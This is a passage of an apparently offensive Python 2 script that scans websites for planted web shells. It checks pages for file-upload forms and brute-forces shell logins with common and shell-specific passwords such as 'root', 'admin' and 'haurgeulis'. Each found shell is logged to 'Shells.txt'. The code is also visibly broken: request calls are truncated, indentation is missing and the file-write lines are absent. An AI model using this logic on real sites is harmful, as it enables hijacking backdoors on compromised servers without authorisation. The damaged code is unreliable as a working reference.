if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH14_J_content = requests.get(SH14_J,timeout=15).content
if ' type="file"' in SH14_J_content or ' type=\'file\'' in SH14_J_content or ' type= "file"' in SH14_J_content or ' type= \'file\'' in SH14_J_content or ' type = "file"' in SH14_J_content or ' type = \'file\'' in SH14_J_content or ' type ="file"' in SH14_J_content or ' type =\'file\'' in SH14_J_content or ' type=file' in SH14_J_content or ' type =file' in SH14_J_content or ' type= file' in SH14_J_content or ' type = file' in SH14_J_content or 'Upload</a> ]</li><li>[' in SH14_J_content or 'upload</a><li><a>Sym' in SH14_J_content :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH14_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH15_J_content = requests.get(SH15_J,timeout=15).content
if ' type="file"' in SH15_J_content or ' type=\'file\'' in SH15_J_content or ' type= "file"' in SH15_J_content or ' type= \'file\'' in SH15_J_content or ' type = "file"' in SH15_J_content or ' type = \'file\'' in SH15_J_content or ' type ="file"' in SH15_J_content or ' type =\'file\'' in SH15_J_content or ' type=file' in SH15_J_content or ' type =file' in SH15_J_content or ' type= file' in SH15_J_content or ' type = file' in SH15_J_content or 'Upload</a> ]</li><li>[' in SH15_J_content or 'upload</a><li><a>Sym' in SH15_J_content :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH15_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez5]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH16_J_content = requests.get(SH16_J,timeout=15).content
if ' type="file"' in SH16_J_content or ' type=\'file\'' in SH16_J_content or ' type= "file"' in SH16_J_content or ' type= \'file\'' in SH16_J_content or ' type = "file"' in SH16_J_content or ' type = \'file\'' in SH16_J_content or ' type ="file"' in SH16_J_content or ' type =\'file\'' in SH16_J_content or ' type=file' in SH16_J_content or ' type =file' in SH16_J_content or ' type= file' in SH16_J_content or ' type = file' in SH16_J_content or 'Upload</a> ]</li><li>[' in SH16_J_content or 'upload</a><li><a>Sym' in SH16_J_content :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH16_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH17_J_content = requests.get(SH17_J,timeout=15).content
if ' type="file"' in SH17_J_content or ' type=\'file\'' in SH17_J_content or ' type= "file"' in SH17_J_content or ' type= \'file\'' in SH17_J_content or ' type = "file"' in SH17_J_content or ' type = \'file\'' in SH17_J_content or ' type ="file"' in SH17_J_content or ' type =\'file\'' in SH17_J_content or ' type=file' in SH17_J_content or ' type =file' in SH17_J_content or ' type= file' in SH17_J_content or ' type = file' in SH17_J_content or 'Upload</a> ]</li><li>[' in SH17_J_content or 'upload</a><li><a>Sym' in SH17_J_content :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH17_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
